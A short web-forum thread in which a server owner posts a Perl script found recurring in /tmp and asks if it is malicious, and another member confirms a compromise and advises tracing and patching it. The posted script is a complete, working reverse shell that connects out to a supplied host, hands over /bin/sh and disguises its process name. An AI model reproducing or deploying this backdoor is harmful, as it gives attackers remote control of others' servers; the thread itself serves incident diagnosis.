Is this a malicious script?

SuperBaby

SuperBaby

Well-Known Member
Nov 27, 2003
345
1
166
Thailand
cPanel Access Level
Website Owner
Twitter
I found this script called "back" in the /tmp folder. I deleted it and it came back again after a day. Is it a malicious script?

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Click to expand...
 
N

NightStorm

Well-Known Member
Jul 28, 2003
285
4
168
cPanel Access Level
Root Administrator
Twitter
In a word, yes. It's a compromise, though not necessarily a root one. You'll need to track down the source of the file, and patch the problem, as well as go over your server's security with a fine-tooth comb and make sure that nothing else bad gets dropped into /tmp
 
You must log in or register to reply here.
Thread starter Similar threads Forum Replies Date
P Search for a malicious mail script Security 4
Bashed Malicious Spam Scripts Security 2
postcd SOLVED Malicious perl script on account Security 3
Bashed need help preventing malicious spam .php scripts Security 11
H Plugin to remove malicious scripts from website Security 3
Similar threads
Search for a malicious mail script
Malicious Spam Scripts
SOLVED Malicious perl script on account
need help preventing malicious spam .php scripts
Plugin to remove malicious scripts from website
Top Bottom